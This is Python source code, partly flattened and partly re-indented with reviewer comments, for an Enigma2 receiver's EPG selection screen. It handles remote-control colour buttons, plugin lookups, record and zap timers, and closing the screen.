self.openEPGSearch() if config.epgselection.vertical_green.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_green.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_green.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_green.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_green.value == "gotodatetime": self.enterDateTime() else: self.RecordTimerQuestion(True) def greenButtonPressedLong(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.showTimerList() def yellowButtonPressed(self): self.closeEventViewDialog() from 
Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_yellow.value == "24plus": self.nextService() if config.epgselection.graph_yellow.value == "24minus": self.prevService() if config.epgselection.graph_yellow.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.graph_yellow.value == "imdb": self.openIMDb() if config.epgselection.graph_yellow.value == "autotimer": self.addAutoTimer() if config.epgselection.graph_yellow.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_yellow.value == "epgsearch" or config.epgselection.graph_yellow.value == None: self.openEPGSearch() if config.epgselection.graph_yellow.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_yellow.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_yellow.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_yellow.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_yellow.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_yellow.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_yellow.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_yellow.value == "24plus": self.setPlus24h() if config.epgselection.vertical_yellow.value == "24minus": self.setMinus24h() if config.epgselection.vertical_yellow.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_yellow.value == "imdb" or config.epgselection.vertical_yellow.value == None: self.openIMDb() if config.epgselection.vertical_yellow.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_yellow.value == "bouquetlist": 
self.Bouquetlist() if config.epgselection.vertical_yellow.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_yellow.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_yellow.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_yellow.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_yellow.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_yellow.value == "gotodatetime": self.enterDateTime() else: self.openEPGSearch() def blueButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_blue.value == "24plus": self.nextService() if config.epgselection.graph_blue.value == "24minus": self.prevService() if config.epgselection.graph_blue.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.graph_blue.value == "imdb": self.openIMDb() if config.epgselection.graph_blue.value == "autotimer" or config.epgselection.graph_blue.value == None: self.addAutoTimer() if config.epgselection.graph_blue.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_blue.value == "epgsearch": self.openEPGSearch() if config.epgselection.graph_blue.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_blue.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_blue.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_blue.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_blue.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_blue.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_blue.value == "prevbouquet" and self.type == 
EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_blue.value == "24plus": self.setPlus24h() if config.epgselection.vertical_blue.value == "24minus": self.setMinus24h() if config.epgselection.vertical_blue.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_blue.value == "imdb" or config.epgselection.vertical_blue.value == None: self.openIMDb() if config.epgselection.vertical_blue.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_blue.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_blue.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_blue.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_blue.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_blue.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_blue.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_blue.value == "gotodatetime": self.enterDateTime() else: self.addAutoTimer() def blueButtonPressedLong(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.showAutoTimerList() def openSimilarList(self, eventid, refstr): self.session.open(EPGSelection, refstr, None, eventid) def setServices(self, services): self.services = services self.onCreate() def setService(self, service): self.currentService = service self.onCreate() def eventViewCallback(self, setEvent, setService, val): l = self['list'+str(self.activeList)] old = l.getCurrent() if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.updEvent(val, False) elif val == -1: self.moveUp() elif val == +1: self.moveDown() cur = l.getCurrent() if (self.type == EPG_TYPE_MULTI or self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH) and cur[0] is None and cur[1].ref != old[1].ref: 
# NOTE(review): this span was re-indented from a flattened source line; the
# branch nesting at the marked points should be verified upstream.

# --- tail of eventViewCallback(setEvent, setService, val); its "def" line
#     and the preceding if/elif chain are on the previous source line ---
self.eventViewCallback(setEvent, setService, val)  # recurse past placeholder rows
else:  # (pairs with the "if" condition on the previous source line)
    setService(cur[1])
    setEvent(cur[0])

def eventSelected(self):
    """OK-button handler: open the event view for the selection."""
    self.infoKeyPressed()

def sortEpg(self):
    # Toggle the single-EPG sort order ('0' = by time, '1' = A-Z),
    # persist it, and re-sort the visible list.
    if self.type == EPG_TYPE_SINGLE or self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR:
        if config.epgselection.sort.value == '0':
            config.epgselection.sort.setValue('1')
        else:
            config.epgselection.sort.setValue('0')
        config.epgselection.sort.save()
        configfile.save()
        self['list'].sortSingleEPG(int(config.epgselection.sort.value))

def OpenSingleEPG(self):
    """Open the single-channel EPG for the highlighted service."""
    cur = self['list'+str(self.activeList)].getCurrent()
    if cur[0] is not None:
        event = cur[0]
        serviceref = cur[1].ref
        if serviceref is not None:
            self.session.open(SingleEPG, serviceref)

def openIMDb(self):
    """Search the selected event's name in the IMDb plugin, if installed."""
    try:
        from Plugins.Extensions.IMDb.plugin import IMDB, IMDBEPGSelection
        try:
            cur = self['list'+str(self.activeList)].getCurrent()
            event = cur[0]
            name = event.getEventName()
        except:
            # No selection / no event: fall back to an empty search term.
            name = ''
        self.session.open(IMDB, name, False)
    except ImportError:
        self.session.open(MessageBox, _('The IMDb plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10)

def openEPGSearch(self):
    """Search the selected event's name in the EPGSearch plugin."""
    try:
        from Plugins.Extensions.EPGSearch.EPGSearch import EPGSearch
        try:
            cur = self['list'+str(self.activeList)].getCurrent()
            event = cur[0]
            name = event.getEventName()
        except:
            name = ''
        self.session.open(EPGSearch, name, False)
    except ImportError:
        self.session.open(MessageBox, _('The EPGSearch plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10)

def addAutoTimer(self):
    """Create an AutoTimer (with editor) from the selected event."""
    try:
        from Plugins.Extensions.AutoTimer.AutoTimerEditor import addAutotimerFromEvent
        cur = self['list'+str(self.activeList)].getCurrent()
        event = cur[0]
        if not event:
            return
        serviceref = cur[1]
        addAutotimerFromEvent(self.session, evt=event, service=serviceref)
        # Refresh shortly afterwards so the timer icons update.
        self.refreshTimer.start(3000)
    except ImportError:
        self.session.open(MessageBox, _('The AutoTimer plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10)

def addAutoTimerSilent(self):
    """Create an AutoTimer from the selected event without the editor."""
    try:
        from Plugins.Extensions.AutoTimer.AutoTimerEditor import addAutotimerFromEventSilent
        cur = self['list'+str(self.activeList)].getCurrent()
        event = cur[0]
        if not event:
            return
        serviceref = cur[1]
        addAutotimerFromEventSilent(self.session, evt=event, service=serviceref)
        self.refreshTimer.start(3000)
    except ImportError:
        self.session.open(MessageBox, _('The AutoTimer plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10)

def showTimerList(self):
    from Screens.TimerEdit import TimerEditList
    self.session.open(TimerEditList)

def showMovieSelection(self):
    from Screens.InfoBar import InfoBar
    InfoBar.instance.showMovies()

def showAutoTimerList(self):
    """Open the AutoTimer overview; the poller is stopped while the
    overview is open and editCallback() restarts it."""
    global autopoller
    global autotimer
    try:
        from Plugins.Extensions.AutoTimer.plugin import main, autostart
        from Plugins.Extensions.AutoTimer.AutoTimer import AutoTimer
        from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller
        autopoller = AutoPoller()
        autotimer = AutoTimer()
        try:
            autotimer.readXml()
        except SyntaxError as se:
            self.session.open(MessageBox, _('Your config file is not well-formed:\n%s') % str(se), type=MessageBox.TYPE_ERROR, timeout=10)
            return
        if autopoller is not None:
            autopoller.stop()
        from Plugins.Extensions.AutoTimer.AutoTimerOverview import AutoTimerOverview
        self.session.openWithCallback(self.editCallback, AutoTimerOverview, autotimer)
    except ImportError:
        self.session.open(MessageBox, _('The AutoTimer plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10)

def editCallback(self, session):
    """Callback from the AutoTimer overview: persist changes and restart
    (or drop) the background poller."""
    global autopoller
    global autotimer
    if session is not None:
        autotimer.writeXml()
        autotimer.parseEPG()
    # NOTE(review): nesting reconstructed — the poller restart is taken to
    # be unconditional on autopoll, not on "session is not None"; verify.
    if config.plugins.autotimer.autopoll.value:
        if autopoller is None:
            from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller
            autopoller = AutoPoller()
        autopoller.start()
    else:
        autopoller = None
        autotimer = None

def timerAdd(self):
    self.RecordTimerQuestion(True)

def editTimer(self, timer):
    self.session.open(TimerEntry, timer)

# (the next method's name, "removeTimer", continues on the following
#  source line after the dangling "def" token)
removeTimer(self, timer): self.closeChoiceBoxDialog() timer.afterEvent = AFTEREVENT.NONE self.session.nav.RecordTimer.removeEntry(timer) self.setTimerButtonText(_("Add Timer")) self.key_green_choice = self.ADD_TIMER self.refreshlist() def disableTimer(self, timer): self.closeChoiceBoxDialog() timer.disable() self.session.nav.RecordTimer.timeChanged(timer) self.setTimerButtonText(_("Add Timer")) self.key_green_choice = self.ADD_TIMER self.refreshlist() def RecordTimerQuestion(self, manual=False): cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] serviceref = cur[1] if event is None: return eventid = event.getEventId() refstr = ':'.join(serviceref.ref.toString().split(':')[:11]) foundtimer = title = None for timer in self.session.nav.RecordTimer.timer_list: if ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr and timer.eit == eventid: foundtimer = timer break else: if self.session.nav.isRecordTimerImageStandard: eventBegin = event.getBeginTime() eventDuration = event.getDuration() x = self.session.nav.RecordTimer.isInTimer(eventid, eventBegin, eventDuration, refstr, True) if x and x[1] in (2, 7, 12): foundtimer = x[3] if foundtimer: timer = foundtimer if timer.isRunning(): cb_func1 = lambda ret: self.removeTimer(timer) cb_func2 = lambda ret: self.editTimer(timer) menu = [(_("Delete timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func1), (_("Edit timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func2)] else: cb_func1 = lambda ret: self.removeTimer(timer) cb_func2 = lambda ret: self.editTimer(timer) cb_func3 = lambda ret: self.disableTimer(timer) menu = [(_("Delete timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func1), (_("Edit timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func2), (_("Disable timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func3)] title = _("Select action for timer %s:") % event.getEventName() else: if not manual: cb_func1 = lambda ret: self.doRecordTimer(True) menu = [(_("Add Record Timer"), 'CALLFUNC', 
# NOTE(review): this span was re-indented from a flattened source line; the
# branch nesting at the marked points should be verified upstream.

# --- tail of RecordTimerQuestion(self, manual=False): completes the
#     "no timer exists yet" menu whose first entry opens on the previous
#     source line ---
            self.RemoveChoiceBoxCB, cb_func1),
        (_("Add Zap Timer"), 'CALLFUNC', self.ChoiceBoxCB, self.doZapTimer),
        (_("Add Zap+Record Timer"), 'CALLFUNC', self.ChoiceBoxCB, self.doZapRecordTimer),
        (_("Add AutoTimer"), 'CALLFUNC', self.ChoiceBoxCB, self.addAutoTimerSilent)
    ]
    title = "%s?" % event.getEventName()
else:
    # Manual request: open the full timer editor pre-filled from the event.
    newEntry = RecordTimerEntry(serviceref, checkOldTimers=True, dirname=preferredTimerPath(), *parseEvent(event))
    self.session.openWithCallback(self.finishedAdd, TimerEntry, newEntry)
if title:
    # Position the ChoiceBox next to the selected row, clamped to the
    # screen; pixel values are scaled by the skin factor.
    self.ChoiceBoxDialog = self.session.instantiateDialog(ChoiceBox, title=title, list=menu, keys=['red', 'green', 'yellow', 'blue'], skin_name="RecordTimerQuestion")
    serviceref = eServiceReference(str(self['list'+str(self.activeList)].getCurrent()[1]))
    pos = self['list'+str(self.activeList)].getSelectionPosition(serviceref, self.activeList)
    sf = getSkinFactor()
    posx = max(self.instance.position().x() + pos[0] - self.ChoiceBoxDialog.instance.size().width() - 20*sf, 0)
    posy = self.instance.position().y() + pos[1]
    posy += self['list'+str(self.activeList)].itemHeight - 2*sf
    if posy + self.ChoiceBoxDialog.instance.size().height() > 720*sf:
        # Would run off the bottom: flip the dialog above the row.
        posy -= self['list'+str(self.activeList)].itemHeight - 4*sf + self.ChoiceBoxDialog.instance.size().height()
    self.ChoiceBoxDialog.instance.move(ePoint(int(posx), int(posy)))
    self.showChoiceBoxDialog()

def recButtonPressed(self):
    # REC short press: ask which kind of timer to create (skip when the
    # InfoBar is handling a long press of the same key).
    from Screens.InfoBar import InfoBar
    InfoBarInstance = InfoBar.instance
    if not InfoBarInstance.LongButtonPressed:
        self.RecordTimerQuestion()

def recButtonPressedLong(self):
    # REC long press: create a zap timer straight away.
    from Screens.InfoBar import InfoBar
    InfoBarInstance = InfoBar.instance
    if InfoBarInstance.LongButtonPressed:
        self.doZapTimer()

def RemoveChoiceBoxCB(self, choice):
    # ChoiceBox callback for the delete/edit/disable menu; those entries
    # carry a bound callback that expects this screen as its argument.
    self.closeChoiceBoxDialog()
    if choice:
        choice(self)

def ChoiceBoxCB(self, choice):
    # ChoiceBox callback for the add-timer menu (no-argument callbacks).
    self.closeChoiceBoxDialog()
    if choice:
        try:
            choice()
        except:
            # NOTE(review): the bare-name "choice" below is a no-op, so any
            # error from the callback is silently swallowed — confirm this
            # is intentional upstream.
            choice

def showChoiceBoxDialog(self):
    # Reroute key handling to the ChoiceBox while it is open.
    self['okactions'].setEnabled(False)
    if 'epgcursoractions' in self:
        self['epgcursoractions'].setEnabled(False)
    # (method continues on the next source line: disables the colour /
    #  recording / epg actions, enables the dialog actions and shows the
    #  dialog)
self['colouractions'].setEnabled(False) self['recordingactions'].setEnabled(False) self['epgactions'].setEnabled(False) self["dialogactions"].setEnabled(True) self.ChoiceBoxDialog['actions'].execBegin() self.ChoiceBoxDialog.show() if 'input_actions' in self: self['input_actions'].setEnabled(False) def closeChoiceBoxDialog(self): self["dialogactions"].setEnabled(False) if self.ChoiceBoxDialog: self.ChoiceBoxDialog['actions'].execEnd() self.session.deleteDialog(self.ChoiceBoxDialog) self['okactions'].setEnabled(True) if 'epgcursoractions' in self: self['epgcursoractions'].setEnabled(True) self['colouractions'].setEnabled(True) self['recordingactions'].setEnabled(True) self['epgactions'].setEnabled(True) if 'input_actions' in self: self['input_actions'].setEnabled(True) def doRecordTimer(self, rec=False): if not rec and 'Plugins.Extensions.EPGSearch.EPGSearch.EPGSearch' in repr(self): self.RecordTimerQuestion() else: self.doInstantTimer(0, 0) def doZapTimer(self): self.doInstantTimer(1, 0) def doZapRecordTimer(self): self.doInstantTimer(0, 1) def doInstantTimer(self, zap, zaprecord): cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] serviceref = cur[1] if event is None: return eventid = event.getEventId() refstr = serviceref.ref.toString() newEntry = RecordTimerEntry(serviceref, checkOldTimers=True, *parseEvent(event)) self.InstantRecordDialog = self.session.instantiateDialog(InstantRecordTimerEntry, newEntry, zap, zaprecord) retval = [True, self.InstantRecordDialog.retval()] self.session.deleteDialogWithCallback(self.finishedAdd, self.InstantRecordDialog, retval) def finishedAdd(self, answer): if answer[0]: entry = answer[1] simulTimerList = self.session.nav.RecordTimer.record(entry) if simulTimerList is not None: for x in simulTimerList: if x.setAutoincreaseEnd(entry): self.session.nav.RecordTimer.timeChanged(x) simulTimerList = self.session.nav.RecordTimer.record(entry) if simulTimerList is not None: if not entry.repeated and not 
# NOTE(review): this chunk arrived with all newlines/indentation stripped; the
# line breaks and nesting below are a reconstruction (tokens unchanged). It
# opens mid-way through finishedAdd() — the start of the enclosing
# "if ... and" condition lies above the visible chunk — and the final method,
# gotoLasttime(), continues past the end of the chunk. These are methods of
# the EPG selection screen class; "self" is that Screen instance.
# --- tail of finishedAdd(answer): timer-conflict auto-resolution ---
            config.recording.margin_before.value and not config.recording.margin_after.value and len(simulTimerList) > 1:
                change_time = False
                conflict_begin = simulTimerList[1].begin
                conflict_end = simulTimerList[1].end
                # If the conflicting timer directly abuts the new entry, shave
                # 30 seconds off the touching edge and retry the sanity check.
                if conflict_begin == entry.end:
                    entry.end -= 30
                    change_time = True
                elif entry.begin == conflict_end:
                    entry.begin += 30
                    change_time = True
                if change_time:
                    simulTimerList = self.session.nav.RecordTimer.record(entry)
            if simulTimerList is not None:
                # Still conflicting after the adjustment: let the user resolve
                # it interactively in the TimerSanityConflict screen.
                self.session.openWithCallback(self.finishSanityCorrection, TimerSanityConflict, simulTimerList)
            self.setTimerButtonText(_("Change timer"))
            self.key_green_choice = self.REMOVE_TIMER
        else:
            self.setTimerButtonText(_("Add Timer"))
            self.key_green_choice = self.ADD_TIMER
        self.refreshlist()

def finishSanityCorrection(self, answer):
    """Callback from the TimerSanityConflict screen; re-enters the add flow."""
    self.finishedAdd(answer)

def OK(self):
    """Handle a short OK press.

    Completes a pending number-zap entry if one is active; otherwise acts
    according to the per-view 'ok' setting ('Zap', 'Zap + Exit', or — for the
    vertical view — a value containing 'Channel', which opens channel info).
    """
    from Screens.InfoBar import InfoBar
    InfoBarInstance = InfoBar.instance
    if not InfoBarInstance.LongButtonPressed:
        if self.zapnumberstarted:
            self.dozumberzap()
        else:
            if self.type == EPG_TYPE_VERTICAL and 'Channel' in config.epgselection.vertical_ok.value:
                self.infoKeyPressed()
            elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_ok.value == 'Zap')
                    or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_ok.value == 'Zap')
                    or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_ok.value == 'Zap')
                    or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_ok.value == 'Zap')
                    or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_ok.value == 'Zap')):
                self.zapTo()
            elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_ok.value == 'Zap + Exit')
                    or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_ok.value == 'Zap + Exit')
                    or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_ok.value == 'Zap + Exit')
                    or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_ok.value == 'Zap + Exit')
                    or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_ok.value == 'Zap + Exit')):
                self.zap()

def OKLong(self):
    """Handle a long OK press; same dispatch as OK() but via the *_oklong settings."""
    from Screens.InfoBar import InfoBar
    InfoBarInstance = InfoBar.instance
    if InfoBarInstance.LongButtonPressed:
        if self.zapnumberstarted:
            self.dozumberzap()
        else:
            if self.type == EPG_TYPE_VERTICAL and 'Channel' in config.epgselection.vertical_oklong.value:
                self.infoKeyPressed()
            elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_oklong.value == 'Zap')
                    or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_oklong.value == 'Zap')
                    or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_oklong.value == 'Zap')
                    or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_oklong.value == 'Zap')
                    or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_oklong.value == 'Zap')):
                self.zapTo()
            elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_oklong.value == 'Zap + Exit')
                    or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_oklong.value == 'Zap + Exit')
                    or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_oklong.value == 'Zap + Exit')
                    or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_oklong.value == 'Zap + Exit')
                    or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_oklong.value == 'Zap + Exit')):
                self.zap()

def epgButtonPressed(self):
    """EPG button: open the single-service EPG for the current selection."""
    self.OpenSingleEPG()

def Info(self):
    """Short Info press: channel info or single EPG per the *_info setting."""
    from Screens.InfoBar import InfoBar
    InfoBarInstance = InfoBar.instance
    if not InfoBarInstance.LongButtonPressed:
        if (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_info.value == 'Channel Info') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_info.value == 'Channel Info'):
            self.infoKeyPressed()
        elif (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_info.value == 'Single EPG') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_info.value == 'Single EPG'):
            self.OpenSingleEPG()
        else:
            self.infoKeyPressed()

def InfoLong(self):
    """Long Info press: channel info or single EPG per the *_infolong setting."""
    from Screens.InfoBar import InfoBar
    InfoBarInstance = InfoBar.instance
    if InfoBarInstance.LongButtonPressed:
        if (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_infolong.value == 'Channel Info') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_infolong.value == 'Channel Info'):
            self.infoKeyPressed()
        elif (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_infolong.value == 'Single EPG') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_infolong.value == 'Single EPG'):
            self.OpenSingleEPG()
        else:
            self.OpenSingleEPG()

def applyButtonState(self, state):
    """Show/hide the now/next/more button widgets.

    state 0 hides everything (and clears the red key text); 1/2/3 highlight
    the now/next/more button respectively.
    """
    if state == 0:
        self['now_button'].hide()
        self['now_button_sel'].hide()
        self['next_button'].hide()
        self['next_button_sel'].hide()
        self['more_button'].hide()
        self['more_button_sel'].hide()
        self['now_text'].hide()
        self['next_text'].hide()
        self['more_text'].hide()
        self['key_red'].setText('')
    else:
        if state == 1:
            self['now_button_sel'].show()
            self['now_button'].hide()
        else:
            self['now_button'].show()
            self['now_button_sel'].hide()
        if state == 2:
            self['next_button_sel'].show()
            self['next_button'].hide()
        else:
            self['next_button'].show()
            self['next_button_sel'].hide()
        if state == 3:
            self['more_button_sel'].show()
            self['more_button'].hide()
        else:
            self['more_button'].show()
            self['more_button_sel'].hide()

def onSelectionChanged(self):
    """Refresh event/service widgets and the green (timer) key for the new selection."""
    if self.type != EPG_TYPE_VERTICAL:
        self.activeList = ''
    cur = self['list'+str(self.activeList)].getCurrent()
    event = cur[0]
    self['Event'].newEvent(event)
    if cur[1] is None:
        self['Service'].newService(None)
    else:
        self['Service'].newService(cur[1].ref)
    if self.type == EPG_TYPE_MULTI:
        count = self['list'].getCurrentChangeCount()
        if self.ask_time != -1:
            self.applyButtonState(0)
        elif count > 1:
            self.applyButtonState(3)
        elif count > 0:
            self.applyButtonState(2)
        else:
            self.applyButtonState(1)
        datestr = ''
        if event is not None:
            now = time()
            beg = event.getBeginTime()
            nowTime = localtime(now)
            begTime = localtime(beg)
            # Different day-of-month -> show the short date, else "Today".
            if nowTime[2] != begTime[2]:
                datestr = strftime(config.usage.date.dayshort.value, begTime)
            else:
                datestr = '%s' % _('Today')
        self['date'].setText(datestr)
    if cur[1] is None or cur[1].getServiceName() == '':
        if self.key_green_choice != self.EMPTY:
            self.setTimerButtonText('')
            self.key_green_choice = self.EMPTY
        return
    if event is None:
        if self.key_green_choice != self.EMPTY:
            self.setTimerButtonText('')
            self.key_green_choice = self.EMPTY
        return
    serviceref = cur[1]
    eventid = event.getEventId()
    # Compare on the first 11 service-reference fields only.
    refstr = ':'.join(serviceref.ref.toString().split(':')[:11])
    isRecordEvent = False
    for timer in self.session.nav.RecordTimer.timer_list:
        if ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr and timer.eit == eventid:
            isRecordEvent = True
            break
    else:
        # No exact eit match: fall back to a time-overlap check.
        if self.session.nav.isRecordTimerImageStandard:
            eventBegin = event.getBeginTime()
            eventDuration = event.getDuration()
            x = self.session.nav.RecordTimer.isInTimer(eventid, eventBegin, eventDuration, refstr)
            if x and x[1] in (2, 7, 12):
                isRecordEvent = True
    if isRecordEvent and self.key_green_choice != self.REMOVE_TIMER:
        self.setTimerButtonText(_("Change timer"))
        self.key_green_choice = self.REMOVE_TIMER
    elif not isRecordEvent and self.key_green_choice != self.ADD_TIMER:
        self.setTimerButtonText(_("Add Timer"))
        self.key_green_choice = self.ADD_TIMER
    if self.eventviewDialog and (self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH):
        self.infoKeyPressed(True)

def moveTimeLines(self, force = False):
    """Redraw the timeline; re-arms the timer to fire at the next minute boundary."""
    self.updateTimelineTimer.start((60 - int(time()) % 60) * 1000)
    self['timeline_text'].setEntries(self['list'], self['timeline_now'], self.time_lines, force)
    self['list'].l.invalidate()

def isPlayable(self):
    """Return True if the service selected in the service list is not a marker/directory."""
    current = ServiceReference(self.servicelist.getCurrentSelection())
    return not current.ref.flags & (eServiceReference.isMarker | eServiceReference.isDirectory)

def setServicelistSelection(self, bouquet, service):
    """Point the service list at *service*, entering *bouquet* first if needed."""
    if self.servicelist:
        if self.servicelist.getRoot() != bouquet:
            self.servicelist.clearPath()
            self.servicelist.enterPath(self.servicelist.bouquet_root)
            self.servicelist.enterPath(bouquet)
        self.servicelist.setCurrentSelection(service)

def closeEventViewDialog(self):
    """Hide and drop the floating event-view dialog, if one is open."""
    if self.eventviewDialog:
        self.eventviewDialog.hide()
        del self.eventviewDialog
        self.eventviewDialog = None

def closeScreen(self, NOCLOSE = False):
    """Close the EPG screen, restoring service selection / zap-back state.

    With NOCLOSE=True on the vertical view the screen stays open after the
    restore logic has run (used by the number-0 refresh).
    """
    if self.type == EPG_TYPE_SINGLE:
        self.close()
        return # stop and do not continue.
    if hasattr(self, 'servicelist') and self.servicelist:
        selected_ref = str(ServiceReference(self.servicelist.getCurrentSelection()))
        current_ref = str(ServiceReference(self.session.nav.getCurrentlyPlayingServiceOrGroup()))
        if selected_ref != current_ref:
            self.servicelist.restoreRoot()
            self.servicelist.setCurrentSelection(self.session.nav.getCurrentlyPlayingServiceOrGroup())
    if self.session.nav.getCurrentlyPlayingServiceOrGroup() and self.StartRef and self.session.nav.getCurrentlyPlayingServiceOrGroup().toString() != self.StartRef.toString():
        if self.zapFunc and self.StartRef and self.StartBouquet:
            # In preview mode, zap back to the service that was playing when
            # the screen opened ('0:0:0:...' marks a non-live/recording ref).
            if ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_preview_mode.value)
                    or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_preview_mode.value)
                    or (self.type in (EPG_TYPE_INFOBAR, EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_preview_mode.value in ('1', '2'))
                    or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_preview_mode.value)
                    or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_preview_mode.value)):
                if '0:0:0:0:0:0:0:0:0' not in self.StartRef.toString():
                    self.zapFunc(None, zapback = True)
            elif '0:0:0:0:0:0:0:0:0' in self.StartRef.toString():
                self.session.nav.playService(self.StartRef)
            else:
                self.zapFunc(None, False)
    if self.session.pipshown:
        if not self.Oldpipshown:
            self.Oldpipshown = False
            self.session.pipshown = False
            del self.session.pip
    if self.Oldpipshown:
        self.session.pipshown = True
    self.closeEventViewDialog()
    if self.type == EPG_TYPE_VERTICAL and NOCLOSE:
        return
    self.close(True)

def zap(self):
    """Zap to the selected service and close the screen."""
    if self.session.nav.getCurrentlyPlayingServiceOrGroup() and '0:0:0:0:0:0:0:0:0' in self.session.nav.getCurrentlyPlayingServiceOrGroup().toString():
        return
    if self.zapFunc:
        self.zapSelectedService()
        self.closeEventViewDialog()
        self.close(True)
    else:
        self.closeEventViewDialog()
        self.close()

def zapSelectedService(self, prev=False):
